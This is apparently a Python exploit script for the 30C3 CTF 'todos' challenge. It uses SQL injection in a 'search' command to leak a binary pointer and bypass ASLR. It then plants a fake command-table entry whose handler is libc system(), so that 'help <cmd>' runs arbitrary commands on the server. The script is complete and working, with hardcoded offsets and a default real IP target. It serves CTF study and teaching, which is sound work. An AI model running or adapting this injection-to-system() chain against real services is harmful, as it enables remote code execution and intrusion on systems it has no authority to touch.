30C3 CTF - todos [300]
Dec 29th, 2013
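#!/usr/bin/python
"""30C3 CTF - todos [300]: SQL-injection pointer leak + fake command entry -> system().

Offensive tooling written against one CTF challenge binary and its libc; the
offsets below mean nothing for any other build.  Do not point this at a host
you are not authorised to attack.  The chain, as far as this script shows it:

1. The ``search`` command is injectable.  The first injection appends one extra
   row (``0x0e000000``) behind ten padding rows, so it becomes result #11 and
   ``show 11`` prints it; the reply carries a raw little-endian pointer into the
   binary.  Why that row makes the server emit a pointer is not visible here.
2. That pointer lies ``TEXT_BASE_DELTA`` above the binary's load address, which
   defeats PIE/ASLR for the text segment.  ``system()`` is then located as a
   fixed distance *below* the binary (``SYSTEM_LIBC_DELTA``), i.e. the script
   assumes the binary-to-libc distance is constant on the target.
3. The second injection stores a record laid out like a command-table entry
   (8-byte tag, 8 filler bytes, three pointers: name, regex, handler).  Name
   and regex reuse the real ``help`` strings and the handler is ``system``, so
   ``help <cmd>`` ends up running ``<cmd>`` on the server.

Usage: ``todos.py <cmd> [host:port]``.  Runs under Python 2 and 3.
"""
import binascii
import socket
import sys
from struct import pack

# Offsets recovered from the challenge binary (text segment) and its libc.
CMD_HELP_NAME = 0x21dc         # "help" command name string
CMD_HELP_REGEX = 0x2162        # "help" command argument regex
SYSTEM_LIBC_DELTA = 0x152b550  # binary base - libc system(): libc is mapped below the binary
TEXT_BASE_DELTA = 0x19d0       # leaked pointer - binary base

DEFAULT_TARGET = ("88.198.89.199", 1234)  # the original challenge host
SOCKET_TIMEOUT = 30.0  # seconds; without one a silent server hangs every recv() forever
RECV_SIZE = 8192

# Both injections are reproduced byte-for-byte from the original exploit.
LEAK_QUERY = (
    b"search ' AND 1=2 UNION ALL (select table_name from information_schema.tables LIMIT 10)"
    b" UNION ALL select 0x0e000000 #\n"
)
EXPLOIT_QUERY_PREFIX = (
    b"search ' AND 1=2 UNION ALL SELECT 0x41 FROM information_schema.tables LIMIT 10"
    b" UNION ALL SELECT 0x"
)


def qword_hex(value):
    """Hex-encode *value* as a little-endian 64-bit word for use inside a MySQL ``0x...`` literal.

    Raises struct.error if *value* is negative or does not fit in 64 bits.
    """
    return binascii.hexlify(pack("<Q", value))


def parse_leaked_base(reply):
    """Recover the binary's load address from the raw ``show 11`` reply.

    *reply* is the bytes exactly as received.  The script treats bytes 4..-2 as
    the little-endian pointer (presumably a 4-byte prefix and a trailing newline
    around it -- confirm against the server's output format).  The slice is
    reversed before the hex conversion because int() parses big-endian digits.

    This relies on the whole reply arriving in a single recv(); a reply split
    across TCP segments would truncate the pointer.  Good enough for the CTF.

    Raises ValueError when the reply is too short to hold a pointer.
    """
    raw = reply[4:-1]
    if not raw:
        raise ValueError("show reply too short to hold a pointer: %r" % (reply,))
    leaked = int(binascii.hexlify(raw[::-1]), 16)
    return leaked - TEXT_BASE_DELTA


def build_fake_entry(base):
    """Return the hex body of the fake command-table entry for a binary loaded at *base*.

    Layout, all little-endian: 8-byte tag 0x02, 8 filler bytes, pointer to the
    real "help" name, pointer to the real "help" regex, pointer to libc system().
    The sixteen 'A's are hex *digits* inside the ``0x...`` literal, i.e. eight
    0xAA bytes, not the letter A.
    """
    return (
        b"0200000000000000"
        + b"A" * 16
        + qword_hex(base + CMD_HELP_NAME)
        + qword_hex(base + CMD_HELP_REGEX)
        + qword_hex(base - SYSTEM_LIBC_DELTA)
    )


def build_exploit_query(base):
    """Return the complete ``search`` line that plants the fake entry (see build_fake_entry)."""
    return EXPLOIT_QUERY_PREFIX + build_fake_entry(base) + b" #\n"


def parse_target(spec):
    """Parse ``host:port`` into a ``(host, port)`` tuple; raises ValueError on malformed input."""
    host, sep, port = spec.rpartition(":")
    if not sep or not host:
        raise ValueError("expected host:port, got %r" % (spec,))
    return host, int(port)


def run(cmd, target=DEFAULT_TARGET):
    """Perform the whole exchange against *target* and return the raw reply to ``help <cmd>``.

    *cmd* is bytes and is sent verbatim: a newline inside it ends the ``help``
    line early and the remainder is parsed by the server as further commands.
    The socket is always closed, even if a step raises.
    """
    sock = socket.create_connection(target, timeout=SOCKET_TIMEOUT)
    try:
        sock.recv(RECV_SIZE)                 # banner
        sock.sendall(b"login bla bla\n")     # dummy credentials; the reply is never checked
        sock.recv(RECV_SIZE)

        # Step 1: plant the row that leaks a pointer, then display it.
        sock.sendall(LEAK_QUERY)
        sock.recv(RECV_SIZE)
        sock.sendall(b"show 11\n")
        base = parse_leaked_base(sock.recv(RECV_SIZE))

        # Step 2: plant the fake command entry whose handler is system().
        sock.sendall(build_exploit_query(base))
        sock.recv(RECV_SIZE)

        # Step 3: "help <cmd>" now dispatches to system(<cmd>) on the server.
        sock.sendall(b"help " + cmd + b"\n")
        return sock.recv(RECV_SIZE)
    finally:
        # sendall() instead of send() above because send() may write only part of
        # the line; here close() is actually called (the original had a bare `s.close`).
        sock.close()


def main(argv):
    """Command-line entry point; returns the process exit status."""
    if len(argv) not in (2, 3):
        sys.stderr.write("Usage: %s <cmd> [host:port]\n" % argv[0])
        return -1
    cmd = argv[1]
    if not isinstance(cmd, bytes):
        cmd = cmd.encode("utf-8")  # Python 3: argv is text, the wire is bytes
    target = parse_target(argv[2]) if len(argv) == 3 else DEFAULT_TARGET
    reply = run(cmd, target)
    # Emit the server's bytes untouched on both Python 2 (stdout is bytes) and 3 (stdout.buffer).
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(reply.strip() + b"\n")
    out.flush()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))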